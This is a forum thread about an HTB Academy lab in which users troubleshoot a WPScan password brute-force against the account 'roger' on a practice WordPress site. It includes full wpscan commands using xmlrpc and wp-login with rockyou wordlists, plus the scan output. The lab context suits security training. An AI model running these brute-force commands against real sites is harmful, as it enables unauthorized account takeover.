HTB Academy - Hacking WordPress, Attacking WordPress Users

The question is:

Perform a bruteforce attack against the user “roger” on your target with the wordlist “rockyou.txt”.

I use the command line from the example:

```
wpscan --password-attack xmlrpc -t 20 -U admin, david -P passwords.txt --url http://blog.inlanefreight.com
```

and change the user to “roger”, the path to rockyou.txt and the URL to my target.

```
wpscan --password-attack xmlrpc -t 20 -U roger -P /opt/useful/SecLists/Passwords/Leaked-Databases/rockyou.txt --url www.inlanefreight.com --api-token TOKEN
```

The answer I get after 2 sec is: [i] No Valid Passwords Found.

When I try

```
wpscan --password-attack wp-login -t 20 -U roger -P /opt/useful/SecLists/Passwords/Leaked-Databases/rockyou.txt --url www.inlanefreight.com --api-token TOKEN
```

It goes through the password list but gives me only: Error: Unknown response received Code: 403

Hey! The url in the command line example and this one are different. It has been a bit since I did that module, but are you sure that the www is right? Or should it be blog.inlanefreight.com?

I didn’t boot up the exercise to check, just figured I would see if that could be it.
-onthesauce

Hey, thanks for your reply!
I haven't had the time to come back to the challenge.

Yes, you are right, that was not the URL that was supplied in the module.

Once I got it to perform the XMLRPC password attack:

 
```
wpscan --password-attack xmlrpc -t 20 -U roger -P /usr/share/seclists/Passwords/Leaked-Databases/rockyou-05.txt --url http://blog.inlanefreight.com --random-user-agent --ignore-main-redirect --detection-mode aggressive --force
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.22
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________

[+] URL: http://blog.inlanefreight.com/ [134.209.24.248]
[+] Started: Tue Nov  1 09:54:22 2022

Interesting Finding(s):

[+] XML-RPC seems to be enabled: http://blog.inlanefreight.com/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/

[+] WordPress readme found: http://blog.inlanefreight.com/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] Upload directory has listing enabled: http://blog.inlanefreight.com/wp-content/uploads/
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://blog.inlanefreight.com/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 5.6.10 identified (Outdated, released on 0001-01-01).
 | Found By: Atom Generator (Aggressive Detection)
 |  - http://blog.inlanefreight.com/index.php/feed/atom/, <generator uri="https://wordpress.org/" version="5.6.10">WordPress</generator>
 | Confirmed By: Style Etag (Aggressive Detection)
 |  - http://blog.inlanefreight.com/wp-admin/load-styles.php, Match: '5.6.10'

[i] The main theme could not be detected.

[+] Enumerating All Plugins (via Passive Methods)

[i] No plugins Found.

[+] Enumerating Config Backups (via Aggressive Methods)
 Checking Config Backups - Time: 00:00:03 <====================================> (137 / 137) 100.00% Time: 00:00:03

[i] No Config Backups Found.

[+] Performing password attack on Xmlrpc against 1 user/s
Error: Server error, try reducing the number of threads.
Error: Server error, try reducing the number of threads.
Error: Server error, try reducing the number of threads.
Error: Server error, try reducing the number of threads.
Error: Server error, try reducing the number of threads.
Error: Server error, try reducing the number of threads.
Error: Server error, try reducing the number of threads.
Error: Server error, try reducing the number of threads.
Error: Server error, try reducing the number of threads.
Error: Server error, try reducing the number of threads.
Error: Server error, try reducing the number of threads.
Error: Server error, try reducing the number of threads.
Trying roger / 12345678 Time: 00:00:02 <=========================================> (13 / 13) 100.00% Time: 00:00:02
Error: Server error, try reducing the number of threads.

[i] No Valid Passwords Found.

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Tue Nov  1 09:54:32 2022
[+] Requests Done: 187
[+] Cached Requests: 2
[+] Data Sent: 47.776 KB
[+] Data Received: 348.837 KB
[+] Memory used: 205.691 MB
[+] Elapsed time: 00:00:09
```

Afterwards, even with the same command, I always get the reply: No Valid Passwords Found

Scan Aborted: The XML-RPC Interface was not detected.

which is strange because it worked in the first place :smiley:

Got it… sorry, I had trouble with the URL… I used the IP and it worked…

Just to help anyone in the future.

Use the rockyou-xx.txt file to crack it - I think I got up to rockyou-35.txt or something to get his password. No need for token in this one.

(The rockyou.txt is a MASSIVE file, so use the shorter version just here for learning purposes. IRL I have cracked many passwords with rockyou)

Hi @Cyberstorm, when I run this command,

```
wpscan --password-attack xmlrpc -t 20 -U admin, david -P passwords.txt --url http://blog.inlanefreight.com
```

passwords.txt use rockme-xx in the Seclist folder.

And also I think your URL is not correct, as I recall .com => .local

If you have not already, remember to add the inlanefreight.local and blog.inlanefreight.local to your /etc/hosts file.

Thanks, I’m following this tutorial https://www.youtube.com/watch?v=Z9QPazbfwFE and I did everything that is being done here but I do get

Scan Aborted: --passwords The path ‘/opt/useful/SecLists/Passwords/Leaked-Databases/rockyou.txt’ does not exist or is not a file

Because the password file is NOT called rockyou.txt but is split into smaller ones like rockyou-10, -35 etc.
Try to actually browse the password list folder to see what you have to work with. But rockyou.txt does 100% not work, as no such file exists in the SecList, as it is millions of passwords and gigabytes of data.

Don’t follow a YouTube video blindly, but adapt.